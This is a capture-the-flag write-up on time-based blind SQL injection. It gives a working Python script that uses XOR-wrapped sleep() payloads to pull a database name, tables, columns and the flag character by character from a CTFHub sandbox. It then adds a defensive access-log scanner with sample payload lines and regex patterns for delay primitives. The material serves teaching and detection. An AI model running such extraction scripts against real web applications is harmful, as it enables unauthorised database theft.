
ctfhub [time-based blind injection]


The challenge says outright that it is time-based blind injection, so we just do time-based blind injection.

As before, the injection uses XOR to wrap the timing condition into the id parameter.

The script is as follows:

# -*- coding:utf-8 -*-
import requests
import time

flag = ""
for i in range(1, 50):
    lo = 32          # printable ASCII range, narrowed by bisection one character at a time
    hi = 127
    mid = (lo + hi) // 2
    while lo < hi:
        starttime = time.time()
        # pa = '1^if(ascii(substr(database(),{},1))>{},sleep(2),-1)^1'.format(str(i), str(mid))  # dump the database name
        # pa = "1^if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='sqli'),{},1))>{},sleep(2),-1)^1".format(str(i), str(mid))  # dump the table names
        # pa = "1^if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_name='flag'),{},1))>{},sleep(2),-1)^1".format(str(i), str(mid))  # dump the column names
        pa = "1^if(ascii(substr((select group_concat(flag) from flag),{},1))>{},sleep(2),-1)^1".format(str(i), str(mid))
        url = "http://challenge-5f35b16863cadad6.sandbox.ctfhub.com:10800?id="
        ur = url + pa
        requests.get(ur)
        # a response slower than the sleep(2) means the condition held: the character is above mid
        if time.time() - starttime > 2:
            lo = mid + 1
        else:
            hi = mid
        mid = (lo + hi) // 2
    if mid == 32:    # past the end of the string ascii(substr(...)) is 0, so the search bottoms out at 32
        break
    flag += chr(mid)
    print(flag)
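From the defending side, the script above leaves a very recognisable trace in the web server's access log: a burst of requests from one client whose parameter value carries a delay primitive, with response times that jump by the sleep interval whenever the injected condition holds. As an added example (not part of the original write-up), the scanner below runs over constructed log lines in Apache combined format with %D (request time in microseconds) appended, which is an assumption about the log layout, and aggregates those signals per client IP:

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs, unquote_plus

# Constructed sample lines (Apache combined format plus %D request time in microseconds).
# The 10.0.0.9 requests mimic the XOR/sleep probes from the write-up; they are not real traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /?id=1 HTTP/1.1" 200 512 120000
10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "GET /?id=1%5Eif(ascii(substr(database(),1,1))%3E79,sleep(2),-1)%5E1 HTTP/1.1" 200 512 2130000
10.0.0.9 - - [01/Jan/2024:10:00:05 +0000] "GET /?id=1%5Eif(ascii(substr(database(),1,1))%3E103,sleep(2),-1)%5E1 HTTP/1.1" 200 512 110000
10.0.0.9 - - [01/Jan/2024:10:00:06 +0000] "GET /?id=1%5Eif(ascii(substr(database(),1,1))%3E91,sleep(2),-1)%5E1 HTTP/1.1" 200 512 2090000
10.0.0.7 - - [01/Jan/2024:10:00:07 +0000] "GET /?id=2 HTTP/1.1" 200 512 98000
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d+) \S+ (?P<usec>\d+)$')
# Time-delay primitives across common engines (MySQL, PostgreSQL, MSSQL).
DELAY_RE = re.compile(r'\b(sleep|benchmark|pg_sleep|waitfor)\s*\(', re.I)
# Character-by-character extraction: ascii(substr(...)) / ord(mid(...)) comparisons.
PROBE_RE = re.compile(r'\b(ascii|ord)\s*\(\s*(substr|substring|mid)\s*\(', re.I)

def tainted_params(target):
    """Return the names of query parameters whose decoded value carries a delay primitive."""
    query = urlsplit(target).query
    return [name for name, values in parse_qs(query, keep_blank_values=True).items()
            if any(DELAY_RE.search(v) for v in values)]

def scan_access_log(text, slow_threshold_s=1.5):
    """Per client IP: delay payloads seen, how many ran slow, extraction probes, touched params."""
    stats = defaultdict(lambda: {"payloads": 0, "slow": 0, "probes": 0, "params": set()})
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # unexpected line format: skip it rather than abort the whole scan
        params = tainted_params(m["target"])
        if not params:
            continue
        s = stats[m["ip"]]
        s["payloads"] += 1
        s["params"].update(params)
        if PROBE_RE.search(unquote_plus(urlsplit(m["target"]).query)):
            s["probes"] += 1
        # a request slower than the threshold means the delay fired: the injected condition was true
        if int(m["usec"]) / 1_000_000 >= slow_threshold_s:
            s["slow"] += 1
    return dict(stats)

if __name__ == "__main__":
    for ip, s in scan_access_log(SAMPLE_LOG).items():
        print(ip, s)
```

A client with many payload hits, a mix of slow and fast responses, and extraction probes on the same parameter is the binary-search signature; one slow request alone may just be a heavy page.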


sqlmap works too; I won't show it here since it is all quite simple, and the previous post already covered how to use sqlmap:

sqlmap